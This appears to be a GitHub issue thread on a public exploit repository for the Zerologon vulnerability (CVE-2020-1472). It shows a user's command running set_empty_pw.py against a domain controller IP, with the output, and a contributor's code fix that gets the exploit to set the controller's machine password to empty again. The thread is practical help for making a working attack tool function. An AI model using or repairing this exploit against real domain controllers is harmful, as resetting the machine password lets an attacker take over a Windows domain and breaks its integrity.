risksense / zerologon

Exploit for zerologon cve-2020-1472
MIT License

'bytes' object does not support item assignment #2

Closed kevthehermit closed 4 years ago

kevthehermit commented 4 years ago

set_empty_pw hits an error and is not successful; see the error below.

Other POCs worked OK

root@kali:~/Desktop/zerologon-master# python3 set_empty_pw.py DCNAME 10.102.9.46
Performing authentication attempts...
==============================================================================================================================================
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'\x0c\x818\x9e\x86\xe34\xc7' 
NegotiateFlags:                  556793855 
AccountRid:                      1008 
ErrorCode:                       0 

server challenge b'\x0c\x08\xa9\x05\xb8SD>'
'bytes' object does not support item assignment

Success! DC should now have the empty string as its machine password.

gioporta commented 4 years ago

Looks like this is the result of a change in Impacket - see SecureAuthCorp/Impacket@b867b21

I was able to fix it by replacing the following code at lines 93-95 in set_empty_pw.py:

request["ClearNewPassword"] = nrpc.NL_TRUST_PASSWORD()
request["ClearNewPassword"]["Buffer"] = b'\x00'*512
request["ClearNewPassword"]["Length"] = 0 # It winds up being 516 bytes mentioned in the Secur whitepaper because this is 4 bytes

with this:

cnp = nrpc.NL_TRUST_PASSWORD()
cnp['Buffer'] = b'\x00'*512
cnp['Length'] = 0
request["ClearNewPassword"] = cnp.getData()

jmage-rs commented 4 years ago

Updated to support new Impacket changes in https://github.com/risksense/zerologon/commit/05ba66e088797fd2f8e2efcd4dfbd80d64e801f6. Thanks for reporting and thanks for investigating.